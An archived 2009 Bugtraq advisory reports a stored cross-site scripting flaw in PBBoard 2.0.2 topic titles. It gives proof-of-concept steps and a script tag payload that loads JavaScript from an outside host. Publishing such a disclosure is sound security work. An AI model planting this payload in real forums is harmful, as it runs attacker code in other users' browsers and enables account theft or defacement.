| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <200910061516.n96FGXKx003850@www3.securityfocus.com> Date: Tue, 6 Oct 2009 09:16:33 -0600 From: admin@...-area.com To: bugtraq@...urityfocus.com Subject: [Sec-Area Advisory]PBBoard <=2.0.2 - XSS in Topic [Sec-Area Advisory]pbboard <=2.0.2 - XSS in Topic Details ======= Product: PHP <= PBBoard Security-Risk: moderated Remote-Exploit: yes Vendor-URL: http://www.pbboard.com Credits ============ Discovered by: rUnViRuS site: http://www.sec-area.com Affected Products: ---------------------------- test on PBBoard 2.0.2 maybe work under 2.0.2 Original Advisory: ============ http://www.sec-area.com/?p=141 More Details ============ 1. Cross-site scripting ----------------------------------- enable malicious attackers to inject client-side script into web pages Proof of concept: Make a new topic in In the title Write some Javascript/HTML Back to forums You will find the code works Proof of concept code: go to : http://www.pbboard.com/forums/index.php?page=new_topic&index=1&id=[Section id ] then In the title Write some Javascript/HTML like : <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> Back to forums You will find the code works -------------------------------------------- [W]orld [D]efacers [T]eam http://www.Sec-area.com --------------------------------------------
Powered by blists - more mailing lists